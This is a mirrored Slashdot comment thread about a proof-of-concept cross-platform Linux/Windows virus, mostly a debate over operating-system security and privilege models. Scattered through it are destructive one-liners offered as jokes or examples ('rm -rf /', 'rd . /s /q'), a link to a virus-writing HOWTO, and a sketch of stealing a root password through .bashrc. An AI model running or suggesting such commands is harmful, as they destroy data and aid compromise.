Slashdot Mirror
Ambidextrous Linux/Windows Virus
Lam1969 writes "Kaspersky Labs has reported a new proof-of-concept virus that can infect both Windows and Linux systems. It's called Virus.Linux.Bi.a/Virus.Win32.Bi.a and affects ELF binaries and .exe's from windows. SANS has a brief item on the cross-platform virus as well, but no information about a patch or signature yet."
I am curious about how this is a proof of concept virus if it has been done before surely the concept has already been proven?
GeekServ Unix Consulting Services (http://www.geekserv.com)
...BSD just coughed up water and started breathing again.
100 bi jokes to follow
"For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.
Cue ominous thunder. (rolls eyes)
All this means is that data communications and storage has reached a point in time where no one (in theory) is going to notice that infected files get 3 or 4 megs chunkier. The virus writers still have to find vectors into these systems. If they can't find convenient vectors, then the ability to produce a fat binary is useless.
What is this need that security researchers have to claim that all systems are equally vulnerable? Are they worried they're going to be out of a job if everyone moves to more secure computing platforms? I mean, really. They should be encouraging mass migrations to other systems, as it diversifies the playing field and theoretically helps everyone remain safer. But I guess that's not their bread and butter.
Javascript + Nintendo DSi = DSiCade
The article says the worm was written in assembly and I assume it means x86 assembly. Can the worm infect non-x86 Linux hosts?
X(7): A program for managing terminal windows. See also screen(1).
... linux is ready for the desktop? [ducks]
I reserve the right to be wrong.
Windows users are prepared for viruses...
What bizarro Earth are you from?
I'm kind of curious how it works. You can't just take, say, C++ and simply write the exact same code and it will work in both Windows and Linux. Some of the basics like cout do, but, once you start getting a little more complicated and try to modify files, then it gets tricky. I'm guessing we aren't talking about a Java type thing (supposedly Java has securities in place, though I've never directly tested them -- I do know that it can delete or modify a file though.) They mentioned ELF and Win32 executable binaries, so if it's Java, then that's just a frontend obviously. They wouldn't call it an ambidexterious virus if specific code were written for each OS though, right? The only single thing I can think of is maybe make a system call and run "del so-and-so" which in linux's case would rely on an alias being in place to actually run rm.
.hack. In it, one amazingly powerful virus was able to wipe out almost all major operating systems with the exception of the single one, and that one was neither windows nor linux. Ok, it's just a story, but, do you suppose some nut wants to see if they can make this come true in their own way?
Could anyone who knows more programming than I do (which, btw, isn't so hard so feel free to hop in here) give me just an idea of how this is even possible?
You know, suddenly I'm reminded of
welcome our new cross-platform proof-of-concept viral overlords.
Its almost like playing buzzword bingo.
"Writing a cross-platform worm is difficult because it limits you to functions that are available on both operating systems," Ullrich said. "You have to also code the virus in assembly to make it work without relying on any OS-specific function," he said.
This isn't actually quite true, it is merely one way of doing so. You could easily write a virus that uses tons of API and platform specific stuff, but contains a generic detection mechanism at the beginning of its execution and then forks between two pieces of code. One portion contains code specific to Windows and another code specific to Linux. Apart from the generic platform discovery code upon execution it would be like any other platform specific virus. I'm actually surprized this is the first, at least publicized, detection of such a virus.
__
Write My Essay
Big apple, new Yorik, undig it, something's unrotting in Edenmark.
Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.
Actually, you're quite wrong. Linux flaws have existed and are still found today that can be (and have been) taken advantage of. The reason Linux users don't sweat is because flaws are spotted quickly by many people who read the code, and fixed quickly too. That and people who code open-source tend to produce good code, as a matter of pride.
Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA, so everybody stays in supervisor mode and bad things happen.
"A door is what a dog is perpetually on the wrong side of" - Ogden Nash
Well it's about time! Finally inter-platform operability.
The race isn't always to the swift... but that's the way to bet!
Remember, it isn't about whether a virus exists for a specific platform or not.
It's whether you'll be infected or not.
And that is based upon the infection rate vs the removal rate. A virus that cannot spread faster than it is being removed will die.
Microsoft made a number of bad decisions (security-wise) in pursuit of "user friendly" systems.
Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA, so everybody stays in supervisor mode and bad things happen.
Actually most people run with the version of Windows that came installed on their computer. And these accounts are, from the best of my knowledge, always Admin.
I find it interesting that this 'virus' appears shortly after Symantec reportedly gets cushy with the Linux press
..to spread is the hard part.
i ndex.html
4
How to write a Linux virus.
http://virus.enemy.org/virus-writing-HOWTO/_html/
There are numerious reasons why this is true.
Reasons include:
GNU/Linux is a minority platform.
GNU/Linux is highly fragmented.
GNU/Linux security is refined and updated often.
GNU/Linux users are more educated.
Windows has numerious security design flaws that promote viruses, that GNU/Linux systems don't have.
Windows has numerious user interface design flaws that promote viruses, that GNU/Linux doesn't have.
Although this WILL CHANGE if certain Pro-GUI factions get their way.
Like having Gnome and KDE user interfaces ignore the traditional Unix permissions for certain types of files... http://thread.gmane.org/gmane.linux.xdg.devel/701
Damn stupid shit.
But as it stands now a combination of social and technical issues keeps Linux users safe.
One example of a flaw in Windows that causes easy transmission of viruses... Executable files are based on their file names, not based on a permission model.
And it's not just 'exe' or 'bat'.. Here is a partial list of executable file extensions in Windows.
ADE - Microsoft Access Project Extension
ADP - Microsoft Access Project
BAS - Visual Basic Class Module
BAT - Batch File
CHM - Compiled HTML Help File
CMD - Windows NT Command Script
COM - MS-DOS Application
CPL - Control Panel Extension
CRT - Security Certificate
DLL - Dynamic Link Library
DO* - Word Documents and Templates
EXE - Application
HLP - Windows Help File
HTA - HTML Applications
INF - Setup Information File
INS - Internet Communication Settings
ISP - Internet Communication Settings
JS - JScript File
JSE - JScript Encoded Script File
LNK - Shortcut
MDB - Microsoft Access Application
MDE - Microsoft Access MDE Database
MSC - Microsoft Common Console Document
MSI - Windows Installer Package
MSP - Windows Installer Patch
MST - Visual Test Source File
OCX - ActiveX Objects
PCD - Photo CD Image
PIF - Shortcut to MS-DOS Program
POT - PowerPoint Templates
PPT - PowerPoint Files
REG - Registration Entries
SCR - Screen Saver
SCT - Windows Script Component
SHB - Document Shortcut File
SHS - Shell Scrap Object
SYS - System Config/Driver
URL - Internet Shortcut (Uniform Resource Locator)
VB - VBScript File
VBE - VBScript Encoded Script File
VBS - VBScript Script File
WSC - Windows Script Component
WSF - Windows Script File
WSH - Windows Scripting Host Settings File
XL* - Excel Files and Templates
Good luck training users not to use those. And the fact that you can launch executable programs by double clicking email attatchments is another huge shitfest of bad designs.
Sure they are. Here's the link.
H4WT P1CS V1RU5 PR0T3CTION CLICK H3RE
I have reverse-engineered the virus and discovered an insiduous distribution mechanism:
Yes and no. It isn't so much that Linux is a more secure operating system (an argument I won't touch with a 1010 foot pole). It is more that Linux is a more diverse operating system.
If I run Windows XP (perish the thought), and 1000 other people run Windows XP, we are all running the same operating system. Except for a patch or two, we are running the same code with the same holes. A virus that hits one hits us all.
Now, if I run Linux, and 1000 other people run Linux-- well, we aren't all running exactly the same OS. Red Hat, SuSe, live CDs, home brews-- each and every one is slightly different. Top that off with different modules, services, etc running-- and you effectivly have a large number of different operating systems. If a malware exists that uses an explot to propogate, chances are that it isn't going to hit all 1000 of us.
And yes, I know there's a distinction between a virus, a trojan horse, and a worm. But for the sake of argument, the malware I'm talking about is self-propogating and self-executing in some way. Anyone can write a shell script that does rm -rf / and trick at least a couple people into running it.
The real vector that should be a concern for Linux users are cross-platform shares. Let's say you make your Linux box as secure as possible. No holes in any of the services, etc. Well, if you are on a mixed-OS network, and you Samba a Windows drive that is infected-- then you run the risk of being infected. Linux is just as vulnerable as Windows to malware once it has already been executed. So it is much easier to buffer overload the Windows box, and hope the virus gets Samba'd over to a Linux box.
Either that, or we all unplug from the net, power down, and encase our boxes in cement. 100% virus protection (though it would classify as a denial of service...)
UTF-8: There and Back Again
it is because system design makes their impact minimal
Deleting everything in my home directory is anything but minimal.
Potentially exploting local privilage elevation exploits to get root is anything but minimal.
Infecting software after it has been compiled is anything but minimal.
Using social engineering to get root is anything but minimal. How many users do you know who would enter their superuser password to "get free screensavers"? Too many.
Pretending that you're protected by design to the problem indicates that you don't understand how viruses really work. Guess what? You can run as a non-root user in Windows, too. But you can still do a ton of damage as a normal user. Spam relays and DDOs botnets don't need root access, just the ability to send data over the network. How about modifying your GNOME or KDE menu to point to a fake terminal entry or fake admin tools? How do you know that the "gnome-terminal-emulator" you're now typing your password into (through sudo) isn't actually stealing it?
This is the real world. Attackers are smart, they are motivated by profit (because of the spambot racket), and they have plenty of time to find the next buffer overrun.
I'm just recompiling my kernel without support for ELF binaries. Just a quick reboot, and I'
perl -e 'foreach(values %SIG){$_="IGNORE";}while(){}'
Woah, not my Commodore PET (Personal Electronic Transactor)? Nooooo..... I *love* that chicklet keyboard. And the awesome monochrome graphics. They have the playing card suits built in as *characters*, mind you. You can 1000 PRINT them in the built in BASIC!
Let me tell you, though, it was a bitch getting an entire TCP/IP stack working in the 4K of RAM and still have room for a web browser. And don't even get me started on how hard it was to get 100BaseT working over the exapasion port.
Guess it's finally time to retire the old PET.
Here's a quick anecdote for you:
About a week ago, for various reasons, I decided to format my laptop and put Windows XP Professional on there. I previously had Slackware Linux 10.2 installed, but since my desktop has been dual-booting for a while, I figured I might as well get my money's worth and put Windows on the laptop (Linux also doesn't support the SD card reader, but that's another story). The installation went nicely, and I continued to do the tedious tasks that you do after a format. (validate windows, download patches, install drivers and apps, etc...) I installed a second user account for administrative uses and named it "Root".
I logged into my "Root" account, and installed Chessmaster 9000. When I logged back into my regular user account, the game wouldn't start. After a while, it dawned on me that Chessmaster installs the bulk of the data in your My Documents folder. So I uninstalled it, then tried to install it under my user's account. Now, if you're trying to install a program, and you're not the Administrator, a simple dialog will pop up and prompt you the password. However when the install finished, the program wouldn't start. Since I installed as Administrator (I had no choice), I the data was stored in the Administrator's My Documents folder. I tried to link to it - I even tried to install as Administrator, and put a link to his folder (and changing permissions) in the default folder so all users would use it.
Nothing worked properly. I ended up having to change my user account back to Administrator privileges, install the program, then change it back. And this is just for Chessmaster. Other programs are even worse. Doom 3, FarCry, and Call of Duty all install their data in the Program Files folder. So in order to play the game without being root, you have to change the permissions on the saved games folder.
The point of the story is this: Linux doesn't have the problems that Windows has, because it's more secure by design - not by luck. A significant amount of programs are designed for the user to have Administrator access, and assume that you will always run with such permissions. Windows didn't switch the masses to the NT design until XP, which was released 4th Quarter 2001. As a result, you have generations of programs that assume they can read/write whatever and wherever they want - leaving a mess for the end user to sort out. In the end, they'll just say to hell with it and run as Administrator.
(And that's not even addressing the masses that bought OEM pc's that run XP Home with Administrator priviledes by defaut)
Yeah, but even people that know about the "normal" user accounts quickly discover that almost all software written for windows doesn't handle non-admin accounts well. Ever try to install a program just in user space on Windows? If it works at all, you're lucky, and that isn't even scratching the surface of the problems. Got a network password? You can't just switch users to admin (like Linux) or use a sudo password (like Mac) - no, you need to log completely off of your user, then log on as the admin user, install the program, and log off as admin, then log back in as your regular user. Do you have any idea what a MASSIVE pain in the ass that is, especially when I have 20-30 windows open (many are Exceed based X sessions) and am trying to get work done? After 2 months of that and multiple programs that plain wouldn't work if they weren't running as an admin user, I switched back to running exclusively as an admin on Windows.
"Actually, you're quite wrong. Linux flaws have existed and are still found today that can be (and have been) taken advantage of."
/home/granny/.email/files then chmod +X grandchild.jpg.exe, THEN ./grandchild.jpg.exe (in linux you have to create a launcher to execute a file in the gui, double-clicking will not work.
Actually that is pretty much in line with what I have said and does not make me wrong at all.
The system design and development model has led to two things, a shortage of privilage escalation flaws (flaws isn't good enough, they have to allow a user account to gain root under conditions the virus can create) and a short lifespan of any such flaws that exist.
Open source development leads to faster fixes, almost nobody argues this point anymore who is not pushing an agenda. Linux systems are far easier to keep up to date since they are almost entirely open source and free (speech+beer). The result are mechanisms like 'apt-get update; apt-get upgrade' that will update every piece of software on the system, whether os, 3rd party service, or text editor.
This and a strong security model (execute capability must be explicitly enabled by a user who knows how to do it and has permission, default create masks do not make files executable)(users ACTUALLY can only impact files they are supposed to be able to impact). Make the spreading of viruses on linux a non-issue. Flaws are patched faster than the viruses spead, damage is limited to a single user directory and even then only the data created since the last backup. Most clueless users are unable to execute the virus file in the first place because they are unable to set permissions.
grandchild.jpg.exe can never work on linux, period. You have to get the user to open a prompt cd to
"Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA,"
lol, if you say so. I challenge you to browse porn sites for a couple hours using IE under a user account. You will be amazed to find that spyware has spread beyond the one profile every time.
How do you get this "virus"? You have to run infected code, right?
Meh. Sounds like a non-issue to me. Especially considering the rarity of cross-platform Win32/Linux binaries.
Just how does this badboy get on to my system in the first place?
People need to understand that any system that permits a user to run unsigned executable code is susceptible to some kind of "malware", if you can call it that. I place these "viruses" in the same category of rm -r -f / wrapped into a shell script.
WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
I do it all the time in windows. this is an XP-only solution, but meta-l-s or logout/switch user leaves your windows untouched to open an admin account. And if that's too much work, there's a 'Run As' box that (on my system) automatically appears when something that requires admin powers to install is run. Not to mention you can also do something like I do, install it in a folder with it's ACL set to child inheritance and rwx for your user account, which doesn't even require admin power to install in.
So it's not as hard as you make it out to be, but requires a little bit more setup.
Remember, just because you don't know how to use it, it doesn't mean that the tool isn't there for you to use.
"Never attribute to malice that which can be adequately explained by stupidity." -Anon.
Yet another proof of concept Linux virus that will never actually get out of the lab...oh wait, it's also a Windows virus. I guess it will get out of the lab...
I believe the parent is correct. e.g. the chicken is prepared for the oven...
The problem isn't that it isn't there. The problem is that you need to do something to make use of it. On OS X, if there is some task that needs admin access, I get prompted accordingly. With windows, such functionality is only available in certain control panel applets.
If RunAs worked reliably, you'd have a point. Secondary processes started by the installer default back to the standard user, and then fail because they require admin priveledges. PITA indeed.
Changa hates change.
To Infect your Linux box with Virus.Linux.Bi.a, please follow these instructions.
Enjoy
-- Will program for bandwidth
There are lots of reasons why it's harder to infect 'NIX systems.
1. Since on many LiNuX distros, the single source of binaries is usually the distributions' package system, it is usually very easy to detect anything out of the ordinary. The trusted channel is a GOOD thing in these cases.
2. Add in a tool like AIDE (or Tripwire) and you can immediately see everything that is off with your system.
3. How about Linux (and most UNIX) not allowing ctime changes to anything but the current time? The ctime (often said as creation time, but wrongly so- it's the CHANGE time) on any update will always be the current time. The _only_ way around this is to change the system time before you modify files
4. Priv seperation is a big thing. Daemons aren't run as root (or if they do, they drop privs right away). There is no svchost.exe running your services at NT_AUTHORITY or SYSTEM like there is in Windows. Then of course there's no need to run your Web browser as a user with any rights at all. IE7/Vista will fix this of course. Personally I like making, even FireFox, setuid to some untrusted user with no access to files
5. Embedding scripting in every tool isn't as popular in the UNIX worlds, as the core tools work so well. There's no need for office software to have scripting capabilities to change all the files on teh system. There's no need for it!
So do cars, toasters, appliances, and pretty much every item. Welcome to the age where quality means nothing.
They produce good code because they do it for themselves. Most open-source developers are developing for themselves. Every project starts up as "this IMAP server doesn't suit my needs. I'll make a better one". Of course the people who do that are normally the technically able. People make projects for themselves because there's a need that hasn't been met or they're unhappy how it's being met by someone else. Otherwise there's lots of people wasting their time. DJB was unhappy with sendmail/BIND and made alternates. BincIMAP, COurier, and Dovecat folks make them because the others and UW-IMAP didn't do what they want. Patches are submitted to fix something that's affecting them, may affect them, or to add an enhancement they want. Time is money, and people ultimately want to contribute their time for their own benefit somewhere down the road.
Even then, you'd be surprised what you can accomplish to destroy the system. Keep in mind, if you're running a SINGLE USER system as a user in order to add security, you're protecting your LEAST valuable asset. I can blow away a system and install Windows/Office/Adobe and all the tools I need in a few hours and have it configured perfectly. I'm sure most people here can. Now replacing the data would take years! Replacing the productivity lost to viruses/spyware/virii can't be measured. Assessing the impact of leaked administrator and bank passwords could be huge!
-M
when you see the word 'Linux', drink!
Well, I'm reading your post, and if it doesn't get attention it's not because you're a coward, it's because you're an idiot.
RunAs DOES NOT WORK. Oh, it works sometimes, but any process spawned from your installer will run as the user, not the RunAs user as which the installer is running. This is because of a conscious design decision in Windows which is different from every other operating system I've ever used. In order to spawn a process as the RunAs user, you must manually look up the user that the process was spawned as, and use an entirely different function call which takes a user (probably a SID) as an argument. This means that when you start an installer with a 16 bit stub, which is still distressingly common even today, the install will run as you, not the user you entered in the RunAs window.
If YOU had really done a thorough examination, you'd know this already. Shill.
"You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
The real issue is about the virus code running in the first place. Since linux mail clients don't execute code in attachments because that would be a stupendously stupid thing to have a program do (Outlook not so good) that reduces the chance of a virus dramaticly. Since software is available in a different way people don't download bonzi buddy or whatever to linux, so that reduces the chance of malware a huge amount as well. There's still the chance of tricking a user into downloading a binary and running it - but that's reduced by the way package management is done and where people go looking for their binaries, usually in a distro repository.
As the way I understand it, in "the real world" as refered to before, single isolated incidents of people getting tricked into running malware is not what you would call a virus, simply because it is very slow to spread. The different system design as such is what makes the impact minimal. The different design means the problem instead is not a virus, but people getting in via poor security and running rootkits. Someone running bots to find vunerable machines and then getting into them is not a virus, and that's what we should be worried about more than a simplistic view based on what happens on very different systems.
On workplace machines it is very bad practice to let any of these people have the root or admin password on their machine unless it is in a development environment that can't talk to the outside world. The difference with the MS Windows environment is that there is a lot of stuff that can go wrong even without the admin password due to so many things running as that user. With home machines you have to take responsibility for your own actions.Steve Jobs' lawyer may come knocking at the author's door handling him a sub-poena about infringing Universal Binary patents.
And Mac fanboys may go about arguing that Windows and Linux are mere copy-cats and that they were the first to have Universal Binaries.
A properly written Linux/Unix virus will do the equivalent of rootkitting the ".bashrc". It hides itself in that file - then it redirects input/output through itself, being the man-in-the-middle. You won't notice it unless you log in as root and see that users have a disproportionate amount of space.
However, from a proper security perspective, you won't log in as root - you'd use a "lesser" account and "su" to root. That's how the virus will infect the system - it grabs the root password while you type it in, and it rootkits the system.
If you stick with a mindset that viruses can't spread under Linux, then you'll end up with the exact opposite you expect. While we may not be a tech level that makes this level of hacking practical (because it would generally have to emulate an entire operating system), don't be suprised when these attacks start appearing.
I'm not sure from TFA exactly what concept this thing is "proving".
But one I've been waiting for is a dual-boot virus or worm.
When you're running windows, for instance, your unix filesystems are all there to be twiddled with, if the malware knows how. Unix' protection mechanisms would be useless because they're not what's running. So the virus could infect the unix partition and do all sorts of nasties later when you boot Linux. (The virus infection head or payload could include enough filesystem code to twiddle the linux files even if the windows system doesn't know how - all it needs is access to the raw bits, which good 'ol windows will be happy to grant.)
It could also work the other way, of course, with a linux virus or worm infecting things on the Windows partition. But given the relative vulnerabilities I expect most will work the other way.
Point is, a dual-boot system is only as secure as the weaker OS.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Deleting everything in my home directory is anything but minimal.
Compared to deleting your entire system?
Nevertheless, why do you run at a privilege level that can delete everything in your home directory? Is it so you can delete _a_ file that you make it possible to delete _any_ file?
This isn't necessary; I regularly run applications with split privilege levels. My "main" account and my "run" account are in the same group. If I need to edit a file, my vi-wrapper gives group-write permissions to the file I'm editing and then drops privileges. Once the vi-wrapper exits, group-write permissions are removed.
The web browser runs as another user- so while I suppose a "virus" could knock out my bookmarks, I actually publish those over the network (so I can share them with my laptop).
My email client uses rsync to download my email. The client itself runs at a reduced privilege. Worst case scenario is that a malicious virus could delete the flags I put on messages so I might forget which ones I replied to (but only on the most recent ones- because I archive my email into files that have been chattr+i.
All in all, this system that I use is fairly immune to viruses. I'm sorry yours is not, but at least you have the ability to make it so on a Unixish system.
You simply don't on a Windows system.
Spam relays and DDOs botnets don't need root access, just the ability to send data over the network
No. They need to do something normal programs on my system do not. The only UDP traffic I generate is DNS traffic, so I suppose they could DOS my dnscache- it just happens to be running on the same machine. Using iptables is easy with owner-matching, and it protects against this very thing.
Meanwhile, my email is sent using serialmail. I'd notice immediately if when I went to send messages, there were an awful lot of them. Other people would to. Why don't you?
How about modifying your GNOME or KDE menu to point to a fake terminal entry or fake admin tools?
Regular users rarely install programs, and I never do. I don't give my run account the ability to modify my menus. It simply can't happen.
Windows lacks "setuid", so it makes my security measures impossible.
How do you know that the "gnome-terminal-emulator" you're now typing your password into (through sudo) isn't actually stealing it?
It's called a SAK. And I don't switch to a more privileged user without it.
t's important for enterprises to be aware of such issues and implement anti-virus tools for protecting non-Windows operating systems if they haven't done so already, Ullrich said.
So is that the real intention of the entire article? The original report is at viruslist.com, which is again a Kaspersky owned site. So take a guess...
Also, at the end of the story on SANS they have put up an update saying that the virus will have to run as r00t to be able to do any real damage. Kinda like most proof of concept virii developed for *nix in the past isn't it?
rd . /s /q
Been around since NT.
Bullshit.
User-mode processes - even those running as root - have no access to the hardware, except RAM (and then only pages mapped into the address space by the kernel) and CPU (and then only for a period of time decided by the kernel). There is no way to write to the host filesystem except through the kernel. This restriction is enforced by the CPU itself. The kernel runs in ring 0, code within the process does not.
BTW, Have you heard of Plash or Systrace?
Unfortunately I don't think that many Linux systems are set up the way you describe, though I intend to make it my personal quest to make sure they are.
Also, have you come across a way of stopping GUI applications taking over other GUI application via the X protocol?
I know that it is possible to run X applications in untrusted mode, but I understand that is still possible for untrusted applications to snoop on other untrusted applications via X, so we cannot simply run all applications in untrusted mode.
The marketshare argument has been made before again and again. Until Linux has a 90% desktop share this can not be tested. The best we can do is look to the other popular open source programs that do have a stronger marketshare.
Apache is an excellent example, Apache is the market leader in a much more financially appealing segment than the desktop. Strangely it is Microsoft's underdog IIS program that suffers from exploits and worms.
Remember the permissions model under linux does not allow you to simply click a link and execute code... not even local executable code.
1) If you are considering the virus' validity all by itself, it doesn't matter what language it is in. If you are considering it as a proof of concept for a new type of virus, the detail of it being written in assembly is a) not as damming as you portray and b) probably not indicative of a requirement going forward.
.exe. Now there are a lot of precautions to prevent this in an up to date Windows system, but architecturally this is how it happens. In linux, the permissions dictate and the permissions are not transferred with the file content (unless encapsulated by something like tar). gnome-open a potentially executable file without the executable permission and nothing interesting should happen.
2) This is what *really* made me have to reply. You must have *no* idea of what exactly is ELF on a linux box. Every compiled application in the last 10 years or so has been almost exclusively ELF. Without ELF support, you simply don't have a working modern distribution. You could theoretically try to run the old a.out format, but that really isn't any more safe in the long term and highly impractical.
3) Again, the important aspect is 'proof-of-concept' This particular virus doesn't bother to attempt chdir.but that does not preclude the concept of more general implementation. But the rest of what you say is applicable. Once I would have said an inexperienced user frequently only bothers to run as root, since it makes things easier, but with the proliferation of strategies like Ubuntu, things are handled a lot more sanely. The lesson they learned is not to ask a typical user for a root password at *all*, lest they be tempted to use it for everything.
It is conceptually hard to see this thing spreading. The stategy of spawning from ELF applications means it has to be set executable by something prior to being run. In Windows they historically accomplish the analagous function by leveraging the weak strategy of filename based executable status and the 'friendly' feature of hiding extensions that only sometimes work, and you have 'nicepicture.jpg.pif' or something similar that a Windows app lazily hands the file over and then Windows make the lazy choice of honoring
Again, as non-root usage for even the lazy users increase, this strategy with respect to propogation becomes irrelevant as few users run applications capable of relaying the content that they would also have write access to. Now if by some miracle infected by a virus of this type with goals other than spreading, it can be almost as functionally devastating, despite the privilige separation. For the same reasons that the system files and other users are protected from a particular users activity, most of a single-user machine's important data is owned by the user. Sure, if attacked they could make a new user unaffected without reinstall as worst case, but they may have lost all their documents, records, and images they actually care about that aren't recoverable.
The net of it is that the stuff important to a desktop user is not protected from viruses, but the traditional executable binary approach of viruses just doesn't apply to linux. Exploiting buffer mismanagement and such in media players, document readers, image renderers, etc *are* applicable in linux as well as Windows and this would be the only sort of virus that I would watch to be a remote success. This strategy doesn't try to dance around the strong impedements at the low level architecture, but exploits the much more likely poorly coded app given permission to run legitimately by the low level platform.
XML is like violence. If it doesn't solve the problem, use more.